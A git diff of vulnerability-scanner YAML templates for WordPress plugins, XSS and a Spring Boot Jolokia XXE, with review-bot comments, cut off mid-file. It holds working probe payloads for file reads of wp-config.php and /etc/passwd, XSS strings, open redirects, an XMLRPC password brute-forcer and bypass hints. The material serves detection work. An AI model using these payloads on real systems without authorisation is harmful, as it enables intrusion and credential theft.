@@ -4,7 +4,8 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6416 + reference: + - https://www.exploit-db.com/ghdb/6416 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-javospot-lfi-11480.yaml b/poc/wordpress/wp-javospot-lfi-11480.yaml index 6786157651..747c17bdeb 100644 --- a/poc/wordpress/wp-javospot-lfi-11480.yaml +++ b/poc/wordpress/wp-javospot-lfi-11480.yaml @@ -1,4 +1,5 @@ id: wp-javospot-lfi + info: name: Javo Spot Premium Theme - Unauthenticated Directory Traversal author: 0x_Akoko @@ -9,10 +10,12 @@ info: - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 tags: wordpress,wp-theme,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + matchers-condition: and matchers: - type: word @@ -21,6 +24,7 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and + - type: status status: - 200 diff --git a/poc/wordpress/wp-license-file-11489.yaml b/poc/wordpress/wp-license-file-11489.yaml index 57edfbbd1d..5948f09b55 100644 --- a/poc/wordpress/wp-license-file-11489.yaml +++ b/poc/wordpress/wp-license-file-11489.yaml @@ -1,22 +1,18 @@ id: wp-license-file - info: name: WordPress license file disclosure author: yashgoti severity: info tags: wordpress - requests: - method: GET path: - "{{BaseURL}}/license.txt" - matchers-condition: and matchers: - type: word words: - "WordPress - Web publishing software" - - type: status status: - 200 diff --git a/poc/wordpress/wp-license-file.yaml b/poc/wordpress/wp-license-file.yaml index 5948f09b55..f2ee4bbc05 100644 --- a/poc/wordpress/wp-license-file.yaml +++ b/poc/wordpress/wp-license-file.yaml 
@@ -1,18 +1,21 @@ id: wp-license-file + info: name: WordPress license file disclosure author: yashgoti severity: info - tags: wordpress + requests: - method: GET path: - "{{BaseURL}}/license.txt" + matchers-condition: and matchers: - type: word words: - "WordPress - Web publishing software" + - type: status status: - 200 diff --git a/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml b/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml index 1869a7386f..42ab9af2c0 100644 --- a/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml +++ b/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml @@ -1,28 +1,23 @@ id: wp-mailchimp-log-exposure - info: name: WordPress Mailchimp 4 Debug Log Exposure author: aashiq severity: medium description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content - tags: logs,wordpress,exposure - + tags: logs,wordpress,exposure,mailchimp requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "WARNING: Form" - - type: word words: - 'text/plain' - part: header \ No newline at end of file + part: header diff --git a/poc/wordpress/wp-mstore-plugin-listing.yaml b/poc/wordpress/wp-mstore-plugin-listing.yaml index 62099df1e8..b978fbaad6 100644 --- a/poc/wordpress/wp-mstore-plugin-listing.yaml +++ b/poc/wordpress/wp-mstore-plugin-listing.yaml @@ -1,5 +1,4 @@ id: wp-mstore-plugin-listing - info: name: Wordpress Plugin MStore API author: pussycat0x @@ -8,12 +7,10 @@ info: metadata: google-dork: inurl:/wp-content/plugins/mstore-api/ tags: wordpress,listing,wp-plugin - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mstore-api/" - matchers-condition: and matchers: - type: word @@ -21,7 +18,6 @@ requests: - "Index of" - "/wp-content/plugins/mstore-api" condition: and - - type: status status: - - 200 \ No newline at end of file + - 200 
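Review bot: The new side of wp-license-file.yaml deletes `tags: wordpress`, so the template has no tags and drops out of any tag-filtered run. It also keeps `id: wp-license-file`, the same id as wp-license-file-11489.yaml changed just before it in this commit, which makes the two results indistinguishable in reports. I would restore `tags: wordpress` under `severity: info` and consider keeping only one of the two files.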
diff --git a/poc/wordpress/wp-nextgen-xss.yaml b/poc/wordpress/wp-nextgen-xss.yaml index 26930307d2..b8c4c9254f 100644 --- a/poc/wordpress/wp-nextgen-xss.yaml +++ b/poc/wordpress/wp-nextgen-xss.yaml @@ -1,30 +1,24 @@ id: wp-nextgen-xss - info: name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info + reference: https://www.securityfocus.com/bid/57200/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-phpfreechat-xss.yaml b/poc/wordpress/wp-phpfreechat-xss.yaml index f2e72f6d70..ef3aa1dea3 100644 --- a/poc/wordpress/wp-phpfreechat-xss.yaml +++ b/poc/wordpress/wp-phpfreechat-xss.yaml @@ -1,5 +1,4 @@ id: wp-phpfreechat-xss - info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,24 +6,20 @@ info: reference: - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-plugin-lifterlms-11533.yaml b/poc/wordpress/wp-plugin-lifterlms-11533.yaml index 5e7586d2cc..d5ea2cb71b 100644 
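Review bot: The reference in wp-nextgen-xss.yaml changes from the web.archive.org snapshot to `https://www.securityfocus.com/bid/57200/info`, which is presumably the URL the snapshot was taken to preserve. wp-phpfreechat-xss.yaml in the next file section keeps its archived link, so the two templates are now inconsistent. I would keep the list form with `- http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info`.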
--- a/poc/wordpress/wp-plugin-lifterlms-11533.yaml +++ b/poc/wordpress/wp-plugin-lifterlms-11533.yaml @@ -1,22 +1,25 @@ -id: wordpress-plugins-lifterlms -info: - name: WordPress Plugin lifterlms Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6420 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/lifterlms/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/lifterlms/" - condition: and - - type: status - status: - - 200 +id: wordpress-plugins-lifterlms + +info: + name: WordPress Plugin lifterlms Listing + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6420 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/lifterlms/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/lifterlms/" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/wordpress/wp-plugin-utlimate-member.yaml b/poc/wordpress/wp-plugin-utlimate-member.yaml index 69ff7ca70b..f659152483 100644 --- a/poc/wordpress/wp-plugin-utlimate-member.yaml +++ b/poc/wordpress/wp-plugin-utlimate-member.yaml @@ -4,7 +4,8 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6998 + reference: + - https://www.exploit-db.com/ghdb/6998 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-prostore-open-redirect.yaml b/poc/wordpress/wp-prostore-open-redirect.yaml index 5d31d50aae..820d21e476 100644 --- a/poc/wordpress/wp-prostore-open-redirect.yaml 
+++ b/poc/wordpress/wp-prostore-open-redirect.yaml @@ -1,17 +1,21 @@ id: wp-prostore-open-redirect + info: name: WordPress ProStore Themes 1.1.2 Open Redirection author: 0x_Akoko - description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc severity: low + description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. + reference: + - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc tags: wordpress,wp-theme,redirect + requests: - method: GET path: - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" + matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header + part: header \ No newline at end of file diff --git a/poc/wordpress/wp-slideshow-xss.yaml b/poc/wordpress/wp-slideshow-xss.yaml index 49be6efa96..2b851c9f5b 100644 --- a/poc/wordpress/wp-slideshow-xss.yaml +++ b/poc/wordpress/wp-slideshow-xss.yaml @@ -1,5 +1,4 @@ id: wp-slideshow-xss - info: name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,7 +6,6 @@ info: reference: - https://www.exploit-db.com/exploits/37948 tags: wordpress,xss,wp-plugin - requests: - method: GET path: @@ -22,12 +20,10 @@ requests: words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-socialfit-xss-11582.yaml b/poc/wordpress/wp-socialfit-xss-11582.yaml index 56b6690c8f..61f70d16de 100644 --- a/poc/wordpress/wp-socialfit-xss-11582.yaml +++ b/poc/wordpress/wp-socialfit-xss-11582.yaml 
@@ -1,15 +1,13 @@ id: wp-socialfit-xss - info: name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting author: daffainfo severity: medium description: | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: + reference: | - https://www.exploit-db.com/exploits/37481 tags: wordpress,xss,wp-plugin - requests: - method: GET path: diff --git a/poc/wordpress/wp-tutor-lfi-11599.yaml b/poc/wordpress/wp-tutor-lfi-11599.yaml index 4362f3d8af..010102368f 100644 --- a/poc/wordpress/wp-tutor-lfi-11599.yaml +++ b/poc/wordpress/wp-tutor-lfi-11599.yaml @@ -1,27 +1,17 @@ id: wp-tutor-lfi - info: - name: WordPress tutor 1.5.3 - Local File Inclusion + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion author: 0x240x23elu severity: high - description: WordPress tutor.1.5.3 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/48058 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - matchers: - type: regex regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-vault-lfi(1).yaml b/poc/wordpress/wp-vault-lfi(1).yaml old mode 100644 new mode 100755 index 0bb54330d9..8869a324ad --- a/poc/wordpress/wp-vault-lfi(1).yaml +++ b/poc/wordpress/wp-vault-lfi(1).yaml 
@@ -1,24 +1,33 @@ id: wp-vault-local-file-inclusion - info: - name: WP Vault 0.8.6.6 – Local File Inclusion - author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/40850 - tags: wp-plugin,wordpress,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + name: WP Vault 0.8.6.6 Local File Inclusion + author: + - l0ne1y + description: |- + WordPress Plugin Vault 存在路径遍历问题导致文件包含漏洞 + WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 - matchers-condition: and - matchers: + WordPress Plugin Vault 0.8.6.6存在路径遍历漏洞,该漏洞允许远程攻击者通过wpv-image参数读取系统中的任意文件。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.org/plugins/ - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' + method: GET diff --git a/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml b/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml index cb27f780b4..26b60896bf 100644 --- a/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml +++ b/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml @@ -1,5 +1,4 @@ id: wordpress-xmlrpc-brute-force - info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid @@ -9,7 +8,6 @@ info: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ tags: wordpress,php,xmlrpc,fuzz - requests: - raw: - | 
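Review bot: `severity` moves from `high` to `critical` in `wp-vault-lfi(1).yaml` with no `classification` or CVSS vector to back it, which ranks this file read above the sibling `wp-tutor-lfi` template (`high`) for the same weakness class; I would keep `severity: high` unless a score is added. Items 4 and 5 of the new `remediation` text describe bypass conditions rather than fixes, so the field should be trimmed to the upgrade and `open_basedir` guidance. The file header also changes the mode from 100644 to 100755, and a YAML template has no reason to carry the executable bit. The regex tightening to `root:.*:0:0:` is fine.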
@@ -29,18 +27,15 @@ requests: </param> </params> </methodCall> - attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: diff --git a/poc/wordpress/wp-xmlrpc-pingback-detection-11627.yaml b/poc/wordpress/wp-xmlrpc-pingback-detection-11627.yaml index d1f2247e27..e9faa5f0c8 100644 --- a/poc/wordpress/wp-xmlrpc-pingback-detection-11627.yaml +++ b/poc/wordpress/wp-xmlrpc-pingback-detection-11627.yaml @@ -3,10 +3,10 @@ info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info - tags: wordpress,ssrf,oast reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 + tags: wordpress,ssrf,oast,xmlrpc requests: - raw: - | diff --git a/poc/wordpress/wp-xmlrpc.yaml b/poc/wordpress/wp-xmlrpc.yaml index c72351ab3a..850ea25a51 100644 --- a/poc/wordpress/wp-xmlrpc.yaml +++ b/poc/wordpress/wp-xmlrpc.yaml @@ -1,11 +1,9 @@ -id: wordpress-xmlrpc-file-1 - +id: wordpress-xmlrpc-file info: name: WordPress xmlrpc author: udit_thakkur severity: info tags: wordpress - requests: - method: GET path: diff --git a/poc/wordpress/wpdm-cache-session-11439.yaml b/poc/wordpress/wpdm-cache-session-11439.yaml index ba8153e31e..a3ca8cc8f8 100644 --- a/poc/wordpress/wpdm-cache-session-11439.yaml +++ b/poc/wordpress/wpdm-cache-session-11439.yaml @@ -1,10 +1,12 @@ id: wpdm-cache-session + info: name: Wpdm-Cache Session author: dhiyaneshDk severity: medium reference: https://www.exploit-db.com/ghdb/7004 tags: wordpress + requests: - method: GET path: @@ -17,6 +19,7 @@ requests: - ".txt" - "wpdm-cache" condition: and + part: body - type: status status: diff --git a/poc/wordpress/wptouch-open-redirect-11594.yaml b/poc/wordpress/wptouch-open-redirect-11594.yaml index d999043d40..576e334c9e 100644 
--- a/poc/wordpress/wptouch-open-redirect-11594.yaml +++ b/poc/wordpress/wptouch-open-redirect-11594.yaml @@ -1,5 +1,4 @@ id: wptouch-open-redirect - info: name: WPTouch Switch Desktop 3.x Open Redirection author: 0x_Akoko @@ -12,16 +11,15 @@ info: Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. - reference: https://cxsecurity.com/issue/WLB-2020030114 + reference: + - https://cxsecurity.com/issue/WLB-2020030114 tags: wp-plugin,redirect,wordpress - requests: - method: GET path: - - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" - + - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml b/poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml index 31723c324d..8d86dd794f 100644 --- a/poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml +++ b/poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml 
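Review bot: The redirect target in `path` and in the `Location` regex changes from the reserved documentation domain `example.com` to `interact.sh`, which appears to be a live third-party host, while `wp-prostore-open-redirect.yaml` in this same patch still uses `example.com` for the same kind of check. A client that follows the redirect during verification would then contact that host. I would keep `redirect=https://example.com/` and `example\.com` in the regex so the two templates agree. The character class before the domain, `(?:[a-zA-Z0-9\-_\.@]*)`, also accepts any hostname that merely ends in the target string, which is worth tightening separately.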
@@ -2,27 +2,30 @@ id: springboot-actuators-jolokia-xxe info: name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0 + author: dwisiswant0,ipanda severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit + tags: springboot,jolokia,xxe requests: - method: GET path: - - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word + part: body words: - "http:\\/\\/nonexistent:31337\\/logback.xml" - "reloadByURL" - "JoranException" - condition: and - part: body - - type: word - words: - - "X-Application-Context" - part: header \ No newline at end of file + condition: and \ No newline at end of file diff --git a/poc/xss/DOM-XSS-SiteMinder.yaml b/poc/xss/DOM-XSS-SiteMinder.yaml index 2868f2cd46..5aac16e873 100644 --- a/poc/xss/DOM-XSS-SiteMinder.yaml +++ b/poc/xss/DOM-XSS-SiteMinder.yaml @@ -1,5 +1,4 @@ id: siteminder-dom-based-xss - info: name: SiteMinder DOM BASED XSS author: Clark 
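Review bot: The added `/actuator/jolokia/…` path can never satisfy the body matcher: it requests `http:!/!/random:915!/logback.xml`, but the `word` matcher with `condition: and` still requires `http:\\/\\/nonexistent:31337\\/logback.xml`, which only the first path's response would echo. Use the same `nonexistent:31337` URL in the second path, or reduce the word list to `reloadByURL` and `JoranException`. The hunk also removes the `X-Application-Context` header matcher, so detection now rests on the body words and the 200 status alone. Confirm that this loosening is intended.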
@@ -7,23 +6,19 @@ info: description: SiteMinder DOM Based XSS. tags: dom,xss reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html - requests: - method: GET path: - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - 'confirm(document.domain)' - - type: word words: - 'text/html' diff --git a/poc/xss/Oracle-OAM-XSS.yaml b/poc/xss/Oracle-OAM-XSS.yaml index f161e756dd..904ec6970b 100644 --- a/poc/xss/Oracle-OAM-XSS.yaml +++ b/poc/xss/Oracle-OAM-XSS.yaml @@ -1,12 +1,10 @@ id: Oracle-OAM-XSS - info: name: Oracle OAM - XSS author: dk4trin severity: medium description: Cross-site scripting (XSS) on Oracle OAM tags: xss,oracle - requests: - method: GET path: @@ -16,12 +14,10 @@ requests: - type: status status: - 200 - - type: word words: - "alert(1)//>*/;top.alert(2)//" part: body - - type: word words: - "text/html" diff --git a/poc/xss/accessibility-helper-xss-19.yaml b/poc/xss/accessibility-helper-xss-19.yaml index 4d6c81f13e..00527d34da 100644 --- a/poc/xss/accessibility-helper-xss-19.yaml +++ b/poc/xss/accessibility-helper-xss-19.yaml @@ -4,8 +4,7 @@ info: author: dhiyaneshDK severity: medium description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5 + reference: https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5 tags: xss,wordpress,wp-plugin,wp requests: - method: GET 
diff --git a/poc/xss/basic-xss-prober-696.yaml b/poc/xss/basic-xss-prober-696.yaml index e1a7c5b60a..6ad90e4b83 100644 --- a/poc/xss/basic-xss-prober-696.yaml +++ b/poc/xss/basic-xss-prober-696.yaml @@ -2,9 +2,9 @@ id: basic-xss-prober info: name: Basic XSS Prober - author: nadino,geeknik + author: nadino & geeknik severity: low - tags: xss,generic + tags: xss # Basic XSS prober # Manual testing needed for exploitation @@ -28,4 +28,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/xss/chamilo-lms-xss.yaml b/poc/xss/chamilo-lms-xss.yaml index 197aece45e..ad8b95d717 100644 --- a/poc/xss/chamilo-lms-xss.yaml +++ b/poc/xss/chamilo-lms-xss.yaml @@ -1,8 +1,8 @@ -id: chamilo-lms-xss-1 +id: chamilo-lms-xss info: name: Chamilo LMS Cross Site Scripting - author: geeknik + author: nithissh severity: medium description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ tags: xss,chamilo diff --git a/poc/xss/coldfusion-debug-xss.yaml b/poc/xss/coldfusion-debug-xss.yaml index aedbabe04b..8031a8dd4a 100644 --- a/poc/xss/coldfusion-debug-xss.yaml +++ b/poc/xss/coldfusion-debug-xss.yaml @@ -4,7 +4,10 @@ info: author: dhiyaneshDK severity: medium description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,xss requests: - method: GET diff --git a/poc/xss/concrete-xss-1174.yaml b/poc/xss/concrete-xss-1174.yaml index b49633bc55..57ec254a12 100644 --- a/poc/xss/concrete-xss-1174.yaml +++ b/poc/xss/concrete-xss-1174.yaml 
@@ -1,4 +1,5 @@ id: concrete-xss + info: author: shifacyclewla,hackergautam description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter. @@ -9,22 +10,26 @@ info: - https://hackerone.com/reports/643442 - https://github.com/concrete5/concrete5/pull/7999 - https://twitter.com/JacksonHHax/status/1389222207805661187 + requests: - method: GET path: - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>' + matchers-condition: and matchers: - type: word part: body words: - '</iframe><svg/onload=alert("{{randstr}}")>' + - type: word part: header words: - "text/html" - "CONCRETE5" condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/xss/discourse-xss-7013.yaml b/poc/xss/discourse-xss-7013.yaml index abdb65e6c0..1ba1c7ef63 100644 --- a/poc/xss/discourse-xss-7013.yaml +++ b/poc/xss/discourse-xss-7013.yaml @@ -1,10 +1,12 @@ id: discourse-xss + info: name: Discourse CMS - XSS author: madrobot severity: medium description: Cross-site scripting (XSS) on Discourse CMS tags: xss,discourse + requests: - method: GET path: @@ -14,11 +16,13 @@ requests: - type: status status: - 200 + - type: word words: - "<svg/onload=alert(xss)>" part: body + - type: word words: - "text/html" - part: header + part: header \ No newline at end of file diff --git a/poc/xss/dom-xss-7080.yaml b/poc/xss/dom-xss-7080.yaml index 793e1a648a..ed65126d4c 100644 --- a/poc/xss/dom-xss-7080.yaml +++ b/poc/xss/dom-xss-7080.yaml @@ -1,4 +1,5 @@ id: dom-xss + info: name: DOM XSS Sources & Sinks reference: Inspired by https://portswigger.net/blog/introducing-dom-invader @@ -6,6 +7,7 @@ info: author: geeknik severity: info tags: xss,file + file: - extensions: - js @@ -15,6 +17,7 @@ file: - cs - rb - py + extractors: - type: regex name: sink diff --git a/poc/xss/dom-xss.yaml b/poc/xss/dom-xss.yaml index 09394df88e..726c653298 100644 --- a/poc/xss/dom-xss.yaml +++ b/poc/xss/dom-xss.yaml 
@@ -1,46 +1,45 @@ id: dom-xss info: - name: DOM Cross Site Scripting - author: theamanrawat - severity: medium - description: | - Detects DOM-based Cross Site Scripting (XSS) vulnerabilities. - impact: | - Allows attackers to execute malicious scripts in the victim's browser. - remediation: | - Sanitize and validate user input to prevent script injection. - tags: xss,dom,dast,headless -variables: - num: "{{rand_int(10000, 99999)}}" -headless: - - steps: - - action: navigate - args: - url: "{{BaseURL}}" + name: DOM XSS Sources & Sinks + reference: https://portswigger.net/blog/introducing-dom-invader + author: geeknik + severity: info + tags: dom,xss - - action: waitload - payloads: - reflection: - - "'\"><h1>{{num}}</h1>" +file: + - extensions: + - js + - ts + - html + - php + - cs + - rb + - py - fuzzing: - - part: query - type: postfix - mode: single - fuzz: - - "{{reflection}}" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word + extractors: + - type: regex + name: sink part: body - words: - - "<h1>{{num}}</h1>" - - - type: word - part: header - words: - - "text/html" -# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + regex: + - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' + - 
'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' + - 'fetch(\.body)?' + - 'history(\.pushState|\.replaceState)' + - '(session|local)Storage(\.setItem(\.name|\.value))' + - 'anchor(\.href|\.target)' + - 'button(\.formaction|\.value)' + - 'set(Timeout|Interval|Immediate)' + - 'script(\.src|\.textContent|\.innerText|\.innerHTML|\.appendChild|\.append)' + - 'document(\.write|\.writeln|\.implementation\.createHTMLDocument|\.domain|\.cookie|\.evaluate)' + - 'element(\.outerText|\.innerText|\.textContent|\.style\.cssText|\.innerHTML|\.outerHTML|\.insertAdjacentHTML|\.setAttribute(\.onclick|\.onmouseover|\.onmousedown|\.onmouseup|\.onkeydown|\.onkeypress|\.onkeyup|\.href|\.src|\.data|\.action|\.formaction))' + - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' + - 'iframe(\.srcdoc|\.src)' + - 